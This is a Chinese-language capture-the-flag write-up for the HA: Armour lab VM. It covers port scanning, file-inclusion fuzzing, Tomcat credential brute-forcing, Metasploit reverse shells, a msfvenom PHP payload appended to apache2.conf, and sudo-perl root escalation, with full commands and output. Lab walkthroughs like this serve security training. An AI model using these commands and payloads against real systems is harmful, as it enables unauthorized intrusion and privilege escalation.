HA: Armour-Write-up
下载地址:点我
bilibili:点我
nmap扫存活找到IP为:192.168.116.140
➜ ~ nmap -sn 192.168.116.1/24
Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-09 21:21 CST
Nmap scan report for 192.168.116.1
Host is up (0.00031s latency).
Nmap scan report for 192.168.116.140
Host is up (0.00074s latency).
Nmap done: 256 IP addresses (2 hosts up) scanned in 5.09 seconds
➜ ~ nmap -A -T4 192.168.116.140 -p-
Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-09 21:23 CST
Nmap scan report for 192.168.116.140
Host is up (0.0018s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|http-server-header: Apache/2.4.29 (Ubuntu) |_http-title: HA: Armour 8009/tcp open ajp13 Apache Jserv (Protocol v1.3) | ajp-methods: | Supported methods: GET HEAD POST OPTIONS
8080/tcp open http Apache Tomcat 9.0.24
|http-favicon: Apache Tomcat |_http-title: Apache Tomcat/9.0.24 65534/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 28:eb:55:eb:a6:63:c6:fd:23:36:31:27:de:cb:f8:0d (RSA) | 256 a5:1b:86:a9:66:3e:b6:e6:af:d4:33:fe:2c:84:3b:62 (ECDSA) | 256 c7:b2:0c:45:7f:9c:a2:98:fb:52:75:0d:0d:e1:1f:24 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelService detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.68 seconds
➜ ~开放80,8009,8080端口,都是Web服务分别是Apache httpd,Apache Jserv和Apache Tomcat,还有一个65534端口为ssh服务。
指定端口连接ssh,得到第一个flag:
HulkBuster Armour:{7BDA7019C06B53AEFC8EE95D2CDACCAA},和提示:TheOlympics➜ ~ ssh 192.168.116.140 -p65534
The authenticity of host '[192.168.116.140]:65534 ([192.168.116.140]:65534)' can't be established.
ECDSA key fingerprint is SHA256:kYh7ax5tplAJb0W9IkeVePlscYpVFgSLsyepRlFi20A.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[192.168.116.140]:65534' (ECDSA) to the list of known hosts.db 88888888ba 88b d88 ,ad8888ba, 88 88 88888888ba d88b 88 "8b 888b d888 d8"' `"8b 88 88 88 "8b d8'`8b 88 ,8P 88`8b d8'88 d8' `8b 88 88 88 ,8P d8' `8b 88aaaaaa8P' 88 `8b d8' 88 88 88 88 88 88aaaaaa8P'd8YaaaaY8b 88""""88' 88
8b d8' 88 88 88 88 88 88""""88' d8""""""""8b 888b 888b d8' 88 Y8, ,8P 88 88 888b
d8'8b 888b 88888' 88 Y8a. .a8P Y8a. .a8P 888b
d8'8b 888b 888' 88"Y8888Y"'"Y8888Y"' 888bwww.hackingarticles.inHulkBuster Armour:{7BDA7019C06B53AEFC8EE95D2CDACCAA} Hint 1: TheOlympics</code></pre>kali-team@192.168.116.140's password:
浏览器访问80端口,F12发现注释里有armour,notes.txt,还有69,开始不知道什么意思。但是对TCP/UDP端口列表熟悉的话,可以猜出来是TFTP(小型文件传输协议)的端口,详细TCP/UDP端口列表。
可以使用nmap加UDP协议判断69端口是否开放。
➜ ~ sudo nmap -sU -p69 192.168.116.140
[sudo] kali-team 的密码:
Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-09 21:38 CST
Nmap scan report for 192.168.116.140
Host is up (0.00073s latency).PORT STATE SERVICE
69/udp open|filtered tftp
MAC Address: 00:0C:29:E7:98:9F (VMware)Nmap done: 1 IP address (1 host up) scanned in 2.92 seconds
因为要发送UDP报文,所以要加sudo以Root权限执行。发现目标有开放69端口。
TFTP客户端连上服务端下载notes.txt文件,得到第二个flag。
➜ ~ atftp
tftp> connect 192.168.116.140
tftp> get notes.txt
tftp> quit
➜ ~ cat notes.txt
Spiderman Armour:{83A75F0B31435193BAFD3B9C5FD45AEC}Hint 2: maybeevena
➜ ~还有一个提示
maybeevena,不知道什么鬼。先爆破80端口的php后缀文件。➜ ~ dirb http://192.168.116.140 -X .php
DIRB v2.22
By The Dark Raver
START_TIME: Wed Oct 9 22:23:10 2019
URL_BASE: http://192.168.116.140/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
EXTENSIONS_LIST: (.php) | (.php) [NUM = 1]
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.116.140/ ----
- http://192.168.116.140/file.php (CODE:200|SIZE:0)
END_TIME: Wed Oct 9 22:23:13 2019
DOWNLOADED: 4612 - FOUND: 1
➜ ~找到file.php,打开页面一片空白,fuzz参数。
➜ ~ wfuzz -w Kali-Team_Tools/fuzzdb/attack/business-logic/CommonMethodNames.txt --hw 0 'http://192.168.116.140/file.php?FUZZ=/etc/passwd'
libraries.FileLoader: CRITICAL __load_py_from_file. Filename: /home/kali-team/.local/lib/python3.7/site-packages/wfuzz/plugins/payloads/bing.py Exception, msg=No module named 'shodan'
libraries.FileLoader: CRITICAL __load_py_from_file. Filename: /home/kali-team/.local/lib/python3.7/site-packages/wfuzz/plugins/payloads/shodanp.py Exception, msg=No module named 'shodan'
- Wfuzz 2.4 - The Web Fuzzer *
Target: http://192.168.116.140/file.php?FUZZ=/etc/passwd
Total requests: 77===================================================================
ID Response Lines Word Chars Payload
000000033: 200 28 L 36 W 1437 Ch "file"
Total time: 0.130840
Processed Requests: 77
Filtered Requests: 76
Requests/sec.: 588.5036➜ ~
找到参数为file,还是一个文件读取漏洞,因为是Apache的服务,所以先想到读取Apache相关的文件,敏感的文件有
.htpasswd,一般在/etc/apache2/.htpasswd➜ ~ curl http://192.168.116.140/file.php\?file=/etc/apache2/.htpasswd
Ant-Man Armour:{A9F56B7ECE2113C9C4A1214A19EDE99C}Hint 3: StarBucks
➜ ~找到第三个flag,和第三个提示:StarBucks。
官方提示:
P.S. Klaw has a habit of dividing his passwords into 3 parts and save them at different locations. So, if you get some combine them to move forward.
三个提示拼起来就是:TheOlympics maybeevena starBucks,强行当密码。
浏览器打开8080端口,发现是一个Tomcat的管理页面,密码已经知道,现在来爆破用户名。
➜ CeWL git:(master) ✗ ./cewl.rb -v http://192.168.116.140 -d 10 -w dict.txt
CeWL 5.4.6 (Exclusion) Robin Wood (robin@digi.ninja) (https://digi.ninja/)
Starting at http://192.168.116.140
Visiting: http://192.168.116.140, got response code 200
Attribute text found:Offsite link, not following: https://hackingarticles.in
Writing words to file
➜ CeWL git:(master) ✗ cat dict.txt
Armour
PAGE
CONTENT
Header
ARMOUR
Collection
Armours
MCU
Photo
Grid
armour
End
Page
Content
Footer
Powered
Hacking
Articles
notes
txt
➜ CeWL git:(master) ✗ pwd
/home/kali-team/Kali-Team_Tools/CeWL
➜ CeWL git:(master) ✗使用CeWL爬80端口的网页生成用户名的字典,使用MSF对Tomcat进行登录密码枚举。
msf5 auxiliary(scanner/http/tomcat_mgr_login) > show options
Module options (auxiliary/scanner/http/tomcat_mgr_login):
Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS true no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
PASSWORD TheOlympicsmaybeevenaStarBucks no The HTTP password to specify for authentication
PASS_FILE /opt/metasploit/data/wordlists/tomcat_mgr_default_pass.txt no File containing passwords, one per line
Proxies no A proxy chain of format type:host:port[,type:host:port][…]
RHOSTS 192.168.116.140 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
RPORT 8080 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
TARGETURI /manager/html yes URI for Manager login. Default is /manager/html
THREADS 1 yes The number of concurrent threads
USERNAME no The HTTP username to specify for authentication
USERPASS_FILE /opt/metasploit/data/wordlists/tomcat_mgr_default_userpass.txt no File containing users and passwords separated by space, one pair per line
USER_AS_PASS false no Try the username as the password for all users
USER_FILE /home/kali-team/Kali-Team_Tools/CeWL/dict.txt no File containing users, one per line
VERBOSE true yes Whether to print output for all attempts
VHOST no HTTP server virtual hostmsf5 auxiliary(scanner/http/tomcat_mgr_login) >
不知道为什么,我重启服务器后才枚举出来,用户名是:armour。
[+] 192.168.116.140:8080 - Login Successful: armour:TheOlympicsmaybeevenaStarBucksTomcat上传木马有很多方法,可以手工上传WAR文件部署。
这里就使用MSF比较省时间。
msf5 exploit(multi/http/tomcat_mgr_upload) > set httppassword
set httppassword
msf5 exploit(multi/http/tomcat_mgr_upload) > set httppassword TheOlympicsmaybeevenaStarBucks
httppassword => TheOlympicsmaybeevenaStarBucks
msf5 exploit(multi/http/tomcat_mgr_upload) > set httpusername armour
httpusername => armour
msf5 exploit(multi/http/tomcat_mgr_upload) > run[] Started reverse TCP handler on 192.168.116.1:4444 [] Retrieving session ID and CSRF token…
[] Uploading and deploying wJ0oIWvcGX… [] Executing wJ0oIWvcGX…
[] Undeploying wJ0oIWvcGX … [] Sending stage (53867 bytes) to 192.168.116.140
[*] Meterpreter session 1 opened (192.168.116.1:4444 -> 192.168.116.140:50706) at 2019-10-09 23:47:49 +0800meterpreter >
枚举本地开发端口
meterpreter > shell
Process 61 created.
Channel 75 created.
netstat -antp
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.1:8081 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:65534 0.0.0.0:* LISTEN -
tcp6 0 0 :::8080 :::* LISTEN 572/java
tcp6 0 0 :::80 :::* LISTEN -
tcp6 0 0 :::65534 :::* LISTEN -
tcp6 0 0 127.0.0.1:8005 :::* LISTEN 572/java
tcp6 0 0 :::8009 :::* LISTEN 572/java
tcp6 0 0 192.168.116.140:50706 192.168.116.1:4444 ESTABLISHED 685/java这里发现目标主机上监听着8081端口,只能在目标本地进行访问,所以我们可以把端口转发出来,MSF里有自带的。
meterpreter > portfwd /?
Usage: portfwd [-h] [add | delete | list | flush] [args]OPTIONS:
-L <opt> Forward: local host to listen on (optional). Reverse: local host to connect to. -R Indicates a reverse port forward. -h Help banner. -i <opt> Index of the port forward entry to interact with (see the "list" command). -l <opt> Forward: local port to listen on. Reverse: local port to connect to. -p <opt> Forward: remote port to connect to. Reverse: remote port to listen on. -r <opt> Forward: remote host to connect to.meterpreter > portfwd add -l 8081 -p 8081 -r 127.0.0.1
[*] Local TCP relay created: :8081 <-> 127.0.0.1:8081
meterpreter >现在访问自己的8081端口就可以拿到第四个flag。
➜ ~ curl http://127.0.0.1:8081
Black Panther Armour:{690B4BAC6CA9FB81814128A294470F92}或者直接在目标主机访问
tomcat@ubuntu:~$ cd /tmp
cd /tmp
tomcat@ubuntu:/tmp$ wget http://127.0.0.1:8081
wget http://127.0.0.1:8081
--2019-10-10 04:46:42-- http://127.0.0.1:8081/
Connecting to 127.0.0.1:8081… connected.
HTTP request sent, awaiting response… 200 OK
Length: 56 [text/html]
Saving to: ‘index.html’index.html 100%[===================>] 56 --.-KB/s in 0s
2019-10-10 04:46:42 (2.79 MB/s) - ‘index.html’ saved [56/56]
tomcat@ubuntu:/tmp$ cat index.html
cat index.html
Black Panther Armour:{690B4BAC6CA9FB81814128A294470F92}
tomcat@ubuntu:/tmp$查找GUID文件
tomcat@ubuntu:/$ find / -perm -g=s -type f 2>/dev/null
find / -perm -g=s -type f 2>/dev/null
/sbin/pam_extrausers_chkpwd
/sbin/unix_chkpwd
/usr/bin/crontab
/usr/bin/expiry
/usr/bin/chage
/usr/bin/ssh-agent
/usr/bin/wall
/usr/bin/bsd-write
/usr/bin/mlocate
tomcat@ubuntu:/$查找SUID文件
tomcat@ubuntu:/$ find / -perm -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
/bin/mount
/bin/umount
/bin/su
/bin/ping
/bin/fusermount
/usr/bin/vmware-user-suid-wrapper
/usr/bin/traceroute6.iputils
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/sudo
/usr/bin/gpasswd
/usr/bin/chfn
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
tomcat@ubuntu:/$
tomcat@ubuntu:/$ find / -perm -4000 2>dev/null | xargs ls -la
find / -perm -4000 2>dev/null | xargs ls -la
-rwsr-xr-x 1 root root 30800 Aug 11 2016 /bin/fusermount
-rwsr-xr-x 1 root root 43088 Oct 15 2018 /bin/mount
-rwsr-xr-x 1 root root 64424 Jun 28 04:05 /bin/ping
-rwsr-xr-x 1 root root 44664 Mar 22 2019 /bin/su
-rwsr-xr-x 1 root root 26696 Oct 15 2018 /bin/umount
-rwsr-xr-x 1 root root 76496 Mar 22 2019 /usr/bin/chfn
-rwsr-xr-x 1 root root 44528 Mar 22 2019 /usr/bin/chsh
-rwsr-xr-x 1 root root 75824 Mar 22 2019 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 40344 Mar 22 2019 /usr/bin/newgrp
-rwsr-xr-x 1 root root 59640 Mar 22 2019 /usr/bin/passwd
-rwsr-xr-x 1 root root 149080 Jan 17 2018 /usr/bin/sudo
-rwsr-xr-x 1 root root 18448 Jun 28 04:05 /usr/bin/traceroute6.iputils
-rwsr-xr-x 1 root root 10312 May 14 00:07 /usr/bin/vmware-user-suid-wrapper
-rwsr-xr-- 1 root messagebus 42992 Jun 10 11:05 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 10232 Mar 27 2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 436552 Mar 4 2019 /usr/lib/openssh/ssh-keysign
tomcat@ubuntu:/$查找可写目录,发现有/var/www/html
tomcat@ubuntu:/$ find / -writable -type d 2>/dev/null
find / -writable -type d 2>/dev/null
/dev/mqueue
/dev/shm
/tftpboot
/var/lib/php/sessions
/var/www/html
/var/tmp
/proc/902/task/902/fd
/proc/902/fd
/proc/902/map_files
/tmp查找root用户权限可写文件
tomcat@ubuntu:/$ find / -writable -type f 2>/dev/null | grep -v "/proc/" |xargs ls -al |grep root
<ev/null | grep -v "/proc/" |xargs ls -al |grep root
-rwxrwxrwx 1 root root 7224 Sep 21 11:30 /etc/apache2/apache2.conf
-rwxrwxrwx 1 root tomcat 2262 Sep 21 21:15 /opt/tomcat/conf/tomcat-users.xml
--w--w--w- 1 root root 0 Oct 10 02:00 /sys/fs/cgroup/memory/cgroup.event_control
-rw-rw-rw- 1 root root 0 Oct 10 01:09 /sys/kernel/security/apparmor/.access
-rw-rw-rw- 1 root root 0 Oct 10 01:09 /sys/kernel/security/apparmor/.load
-rw-rw-rw- 1 root root 0 Oct 10 01:09 /sys/kernel/security/apparmor/.remove
-rw-rw-rw- 1 root root 0 Oct 10 01:09 /sys/kernel/security/apparmor/.replace
tomcat@ubuntu:/$找到
/etc/apache2/apache2.conf和/opt/tomcat/conf/tomcat-users.xml文件可写。/opt/tomcat/conf/tomcat-users.xml只有之前的账号密码,只能看/etc/apache2/apache2.conf文件了。查找passwd文件,每行记录又被冒号(:)分隔为7个字段分别对应:用户名:口令:用户标识号:组标识号:注释性描述:主目录:登录Shell
group文件对应:组名:口令:组标识号:组内用户列表
tomcat@ubuntu:/$ cat /etc/passwd
cat /etc/passwd
root❌0:0:root:/root:/bin/bash
daemon❌1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin❌2:2:bin:/bin:/usr/sbin/nologin
sys❌3:3:sys:/dev:/usr/sbin/nologin
sync❌4:65534:sync:/bin:/bin/sync
games❌5:60:games:/usr/games:/usr/sbin/nologin
man❌6:12:man:/var/cache/man:/usr/sbin/nologin
lp❌7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail❌8:8:mail:/var/mail:/usr/sbin/nologin
news❌9:9:news:/var/spool/news:/usr/sbin/nologin
uucp❌10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy❌13:13:proxy:/bin:/usr/sbin/nologin
www-data❌33:33:www-data:/var/www:/usr/sbin/nologin
backup❌34:34:backup:/var/backups:/usr/sbin/nologin
list❌38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc❌39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats❌41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody❌65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network❌100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve❌101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog❌102:106::/home/syslog:/usr/sbin/nologin
messagebus❌103:107::/nonexistent:/usr/sbin/nologin
_apt❌104:65534::/nonexistent:/usr/sbin/nologin
uuidd❌105:109::/run/uuidd:/usr/sbin/nologin
armour❌1000:1000:armour,,,:/home/armour:/bin/bash
sshd❌106:65534::/run/sshd:/usr/sbin/nologin
tomcat❌1001:1001::/opt/tomcat:/bin/false
aarti❌1002:1002:,,,:/home/aarti:/bin/bash
tomcat@ubuntu:/$tomcat@ubuntu:~$ cat /etc/group
cat /etc/group
root❌0:
daemon❌1:
bin❌2:
sys❌3:
adm❌4:syslog,armour
tty❌5:
disk❌6:
lp❌7:
mail❌8:
news❌9:
uucp❌10:
man❌12:
proxy❌13:
kmem❌15:
dialout❌20:
fax❌21:
voice❌22:
cdrom❌24:armour
floppy❌25:
tape❌26:
sudo❌27:armour
audio❌29:
dip❌30:armour
www-data❌33:
backup❌34:
operator❌37:
list❌38:
irc❌39:
src❌40:
gnats❌41:
shadow❌42:
utmp❌43:
video❌44:
sasl❌45:
plugdev❌46:armour
staff❌50:
games❌60:
users❌100:
nogroup❌65534:
systemd-journal❌101:
systemd-network❌102:
systemd-resolve❌103:
input❌104:
crontab❌105:
syslog❌106:
messagebus❌107:
mlocate❌108:
uuidd❌109:
ssh❌110:
armour❌1000:
lpadmin❌111:armour
sambashare❌112:armour
ssl-cert❌113:
tomcat❌1001:
aarti❌1002:
tomcat@ubuntu:~$找到一个普通用户aarti和armour
把Apache配置文件下载到自己的电脑,Apache默认以www-data用户启动的
http://192.168.116.140/file.php?file=/etc/apache2/apache2.conf
修改用户和组,让Apache以上面那个普通用户启动,为什么不能以Root用户启动能?因为不重新编译是不能用Root权限的,这样Web服务也起不来。所以只能改aarti的
覆盖Apache配置文件
tomcat@ubuntu:/etc/apache2$ wget http://192.168.116.1:8000/apache2.conf -O apache2.conf
<p://192.168.116.1:8000/apache2.conf -O apache2.conf
--2019-10-10 04:52:49-- http://192.168.116.1:8000/apache2.conf
Connecting to 192.168.116.1:8000… connected.
HTTP request sent, awaiting response… 200 OK
Length: 7195 (7.0K) [text/plain]
Saving to: ‘apache2.conf’apache2.conf 100%[===================>] 7.03K --.-KB/s in 0s
utime(apache2.conf): Operation not permitted
2019-10-10 04:52:49 (243 MB/s) - ‘apache2.conf’ saved [7195/7195]tomcat@ubuntu:/etc/apache2$ cat apache2.conf
写入后到80端口服务下的目录写木马。(这是官方出题人写的),我试了不对,创建文件的用户为Tomcat,aarti用户读不了这个文件,所以是访问不了的,服务端报500错误。
后来我利用文件包含Apache的配置文件获取到了会话。
就是把Shell写进Apache2.conf,再利用上面发现的文件包含漏洞。
➜ ~ msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.116.1 LPORT=2333 -o shell.php
➜ ~ cat shell.php >> apache2.confmsf5 exploit(multi/handler) > run
[] Started reverse TCP handler on 192.168.116.1:2333 [] Sending stage (38288 bytes) to 192.168.116.140
[*] Meterpreter session 3 opened (192.168.116.1:2333 -> 192.168.116.140:48606) at 2019-10-10 13:22:53 +0800meterpreter > getuid
Server username: aarti (1002)
meterpreter > shell
Process 12388 created.
Channel 0 created.
python3.6 -c 'import pty;pty.spawn("/bin/bash")'
aarti@ubuntu:/var/www/html$ whoami
whoami
aarti
aarti@ubuntu:/var/www/html$列举无密码sudo,发现有一个perl
aarti@ubuntu:/var/www/html$ sudo -l
sudo -l
Matching Defaults entries for aarti on ubuntu:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/binUser aarti may run the following commands on ubuntu:
(root) NOPASSWD: /usr/bin/perl
aarti@ubuntu:/var/www/html$
aarti@ubuntu:/var/www/html$ sudo perl -e 'exec "/bin/bash";'
sudo perl -e 'exec "/bin/bash";'
root@ubuntu:/var/www/html# id
id
uid=0(root) gid=0(root) groups=0(root)
root@ubuntu:/var/www/html#
root@ubuntu:~# ls
ls
final.txt
root@ubuntu:~# cat final.txt
cat final.txt______ ______ _____ _ _ ______/\ (_ \ | \ / \ | | | |( <br /> / \ ) )| | _ | || | | || | | | ) )
/ /\ \ ( ( | || || || | | || | | |( (
| || | | || || || || || || || | | | || |||||||| ____/ ______| |_|IronMan Armour:{3AE9D8799D1BB5E201E5704293BB54EF}!! Congrats you have finished this task !!
Contact us here:
Hacking Articles : https://twitter.com/rajchandel/
AArti Singh: https://www.linkedin.com/in/aarti-singh-353698114/
+-+-+-+-+-+ +-+-+-+-+-+-+-+
|E|n|j|o|y| |H|A|C|K|I|N|G|
+-+-+-+-+-+ +-+-+-+-+-+-+-+
root@ubuntu:~#
手机扫一扫
移动阅读更方便
你可能感兴趣的文章